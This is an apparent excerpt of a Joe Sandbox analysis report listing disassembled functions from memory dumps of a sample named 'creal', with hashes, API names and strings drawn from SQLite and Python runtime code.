                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE quick_check GLOB 'CHECK*' OR quick_check GLOB 'NULL*'$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                • API String ID: 3510742995-3865411212
                                                                                                                                                                                                                • Opcode ID: fef009155f3ec238212e6e53dd1564833794cd72d0552d74e22e0b1999fb271b
                                                                                                                                                                                                                • Instruction ID: 20012df40b0083cd96ae4b9fc14aab0db48987ec8050d6af0ab9980b008d638f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fef009155f3ec238212e6e53dd1564833794cd72d0552d74e22e0b1999fb271b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7E1BD32A29B8285EBA5EB96A5483B933A1FF46BC8F044031DE8D47795DF3CE445D302
                                                                                                                                                                                                                Function 00007FF8E71480F0 Relevance: 15.1, APIs: 10, Instructions: 82threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2819143443-0
                                                                                                                                                                                                                • Opcode ID: 23d97488961b93e407653e4d04d1075f3d4a6115df0bee2f52c695c0df5d3962
                                                                                                                                                                                                                • Instruction ID: c7be2b3cbc7795fc1a462c7741dd967a9fbb1cae7c332e23bb80d7f10e93a8a5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23d97488961b93e407653e4d04d1075f3d4a6115df0bee2f52c695c0df5d3962
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF41D836A08742C5EB594FA5D85833C32B4EB45FF9F184232CA3A422D4EF7DA4859302
                                                                                                                                                                                                                Function 00007FF8E714A440 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.UnprintablePlugin$ratio
                                                                                                                                                                                                                • API String ID: 2538524772-1538754472
                                                                                                                                                                                                                • Opcode ID: bd24d104d4e5ddc98eea7bfccf0ae522fc41dc3e0d7e104114ce5afde9d774f5
                                                                                                                                                                                                                • Instruction ID: b4eb9f1abfa602a237aca07cebf5fb64a31bad95b7b88c9c2dabea32a4e877e4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd24d104d4e5ddc98eea7bfccf0ae522fc41dc3e0d7e104114ce5afde9d774f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4051AD32E08B52C1E629DBA5E9013BD63A1AF48BD0F490231DE7D5B7A5EF3CE4418342
                                                                                                                                                                                                                Function 00007FF8E68C0CD0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: new[]
                                                                                                                                                                                                                • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                • Opcode ID: a207f01d118e0909cbb0d974f4ba2a02deab42a4a968a7174006491586c55b51
                                                                                                                                                                                                                • Instruction ID: f192aac767a7cd801f8046a8825d1d370e1990ef3200dceb434b66d9159aa76a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a207f01d118e0909cbb0d974f4ba2a02deab42a4a968a7174006491586c55b51
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88512221F2CAA695FB649BE1A4117BA6791AF45FC8F0C0136DE4E07686CE3DF4858303
                                                                                                                                                                                                                Function 00007FF8E7152220 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DoubleErr_Float_Occurred$From
                                                                                                                                                                                                                • String ID: bool$float$mess_ratio$str
                                                                                                                                                                                                                • API String ID: 627764739-3758540285
                                                                                                                                                                                                                • Opcode ID: 8a02f97511670b38e9bcd773b23a0c6d973fa38f5433283c19ee847a82f0f0a0
                                                                                                                                                                                                                • Instruction ID: 44c0a8b8c741fc57a48dcf46a3daa3978b02ba770e79ff799d7129d887159c6d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a02f97511670b38e9bcd773b23a0c6d973fa38f5433283c19ee847a82f0f0a0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD41B362A0CBC281EA598BE5E4403BEA3A1FF95BC4F544131EAAD13664DF3CE585D703
                                                                                                                                                                                                                Function 00007FF8E7153678 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_Vectorcall$Dict_Item
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 1355803777-217463007
                                                                                                                                                                                                                • Opcode ID: f44407c62ba38c985b018eb4be88fb5605f156d51110e078f0643a87e94a1170
                                                                                                                                                                                                                • Instruction ID: afccda83bc067e14479cdf142c2e5f95f140fffa700fecbaba6524ee48f57332
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f44407c62ba38c985b018eb4be88fb5605f156d51110e078f0643a87e94a1170
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2315575E0DBC3C1EA289FA5E85037D23A1AF45BD8F444035C92D4BBA1DF2DE4458702
                                                                                                                                                                                                                Function 00007FF8E68F19A0 Relevance: 14.0, APIs: 1, Strings: 8, Instructions: 478COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                                • API String ID: 2221118986-554953066
                                                                                                                                                                                                                • Opcode ID: 1932231faa3f000e4fb05286e58fa8bf6b81f2d0eaf89c5c08db61906353d3de
                                                                                                                                                                                                                • Instruction ID: 53b115e2d5b86e195da3be85e6214a0e2aef245c520b0fbed8f7915771536eab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1932231faa3f000e4fb05286e58fa8bf6b81f2d0eaf89c5c08db61906353d3de
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0322BC72B28B9586EB94DFA584947B937A4FB84BC8F404136DA8D43799DF3CE4A0C701
                                                                                                                                                                                                                Function 00007FF8E7144D40 Relevance: 13.6, APIs: 9, Instructions: 71threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2819143443-0
                                                                                                                                                                                                                • Opcode ID: fff406a76837bdfc3caa631c0de594268f2a13e9ca8c66fb56096f08c5388120
                                                                                                                                                                                                                • Instruction ID: e5fd1e46c905b933792706efbf513bd3cf5771112511a1c1d5475eaab471ed74
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fff406a76837bdfc3caa631c0de594268f2a13e9ca8c66fb56096f08c5388120
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0131DA72908B42C1EB994FB5D84833C22A2AF54FE9F154234CD7E566D4DF7DE4868342
                                                                                                                                                                                                                Function 00007FF8E7143220 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_Unicode_$CharactersCopyFastFormatStringmemcpy
                                                                                                                                                                                                                • String ID: join() result is too long for a Python string$sequence item %zd: expected str instance, %.80s found
                                                                                                                                                                                                                • API String ID: 3966466113-1579438684
                                                                                                                                                                                                                • Opcode ID: bd94065e028ba6fa2eb67220a7b20d7e8b3b3746a6e474679368a889752c658a
                                                                                                                                                                                                                • Instruction ID: 80abca30d60a165ffead8d61cf270a9890943445d927c20cd3f4bd00341c8a81
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd94065e028ba6fa2eb67220a7b20d7e8b3b3746a6e474679368a889752c658a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7161C2A2B09746C2EA548B89D8417BD6791FB45BE0F594231CE7D937D0EE3CD846C301
                                                                                                                                                                                                                Function 00007FF8E6910940 Relevance: 12.4, APIs: 1, Strings: 7, Instructions: 414COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                • API String ID: 3510742995-2846519077
                                                                                                                                                                                                                • Opcode ID: 8d24f51b3cd071761d65d7c15b46277e7c666df7a1caa9520ab571ac99f76f39
                                                                                                                                                                                                                • Instruction ID: 5e088bc251229226d1bc913db7cc3a86e3dee6cc6693543d9177dde7de6b56ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d24f51b3cd071761d65d7c15b46277e7c666df7a1caa9520ab571ac99f76f39
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7912DC72A2879286EB54EF6194087A93BA0FB85BC8F118235DE8D07B95DF3DE541C702
                                                                                                                                                                                                                Function 00007FF8E714C130 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
                                                                                                                                                                                                                • String ID: ratio
                                                                                                                                                                                                                • API String ID: 2538524772-4234197119
                                                                                                                                                                                                                • Opcode ID: 3df6ddb79008031f2fa932144166eaa2e045ed27a22e43e2cec9a9a03f3e1f1f
                                                                                                                                                                                                                • Instruction ID: 6d233b24370188c04a349ce68a8893a8c52aa1433b8ed1329cd86828f6e01b8a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3df6ddb79008031f2fa932144166eaa2e045ed27a22e43e2cec9a9a03f3e1f1f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1517E31A08B42C5E6549FE9E8513BC63A0AF49BD4F184231DE6D077A1FE3DE8928303
                                                                                                                                                                                                                Function 00007FF8E714AC10 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_Vectorcall$Err_FormatMethod
                                                                                                                                                                                                                • String ID: bool$eligible
                                                                                                                                                                                                                • API String ID: 131476257-3320767611
                                                                                                                                                                                                                • Opcode ID: f397ca9387d6dfb1835b31036ec0af176946d4d6a5d65748a34c9214785249c7
                                                                                                                                                                                                                • Instruction ID: 89a5bfa8206192d97397acf7321210ddabf0c0895688429753a59cce18c272be
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f397ca9387d6dfb1835b31036ec0af176946d4d6a5d65748a34c9214785249c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB415E32E09B93C1EB688F91E84137D67A1EF45BD4F494031DA6D0BBA5EE2CE480C712
                                                                                                                                                                                                                Function 00007FF8E6907440 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 302COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset$memmove
                                                                                                                                                                                                                • String ID: "%w" $%Q%s
                                                                                                                                                                                                                • API String ID: 3094553269-1987291987
                                                                                                                                                                                                                • Opcode ID: 76a79a9a0c9ad75ce3462e3ecd80cd37abcddcb9193abaad3db594063b6a3bbc
                                                                                                                                                                                                                • Instruction ID: 6f1078c64ac9732252a502f3c7aeb1f3c928264dcd6ff3277e04e375673812b6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76a79a9a0c9ad75ce3462e3ecd80cd37abcddcb9193abaad3db594063b6a3bbc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACC1E226B28A8286EA94EF95A4443797BA1FB46BE4F144235DE6E0B7D5DF3CE440C301
                                                                                                                                                                                                                Function 00007FF8E68D0410 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 254COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 3510742995-3418467682
                                                                                                                                                                                                                • Opcode ID: c07ec9040e4e797a8c51df3787157870fcb5e8697a4d754e414baa0aba183f8f
                                                                                                                                                                                                                • Instruction ID: 83d25461baf8e3c0da3cef1485a3ea5e81b8ad5e6344e98e93884739634aa5d4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c07ec9040e4e797a8c51df3787157870fcb5e8697a4d754e414baa0aba183f8f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0A17772B1C2E18AD7208F9994447BD7BA6EB80BC0F044535DF8A47B86DE3CE545C722
                                                                                                                                                                                                                Function 00007FF8E7146060 Relevance: 12.1, APIs: 8, Instructions: 60threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2819143443-0
                                                                                                                                                                                                                • Opcode ID: 1808094ad2c5952838fb359644ebaa2aa6756bbb3d9bb10f20ec9669fa938947
                                                                                                                                                                                                                • Instruction ID: 6608f99151f6b6c8b6dae990e42e4a290ce8a684ea84179e79dd7186ca3dc913
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1808094ad2c5952838fb359644ebaa2aa6756bbb3d9bb10f20ec9669fa938947
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0121C836A08B42C1EB594FA5E95837C22B1AF48FEDF144234C93E422D9DF7DE4858342
                                                                                                                                                                                                                Function 00007FF8E68C2B40 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 334COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
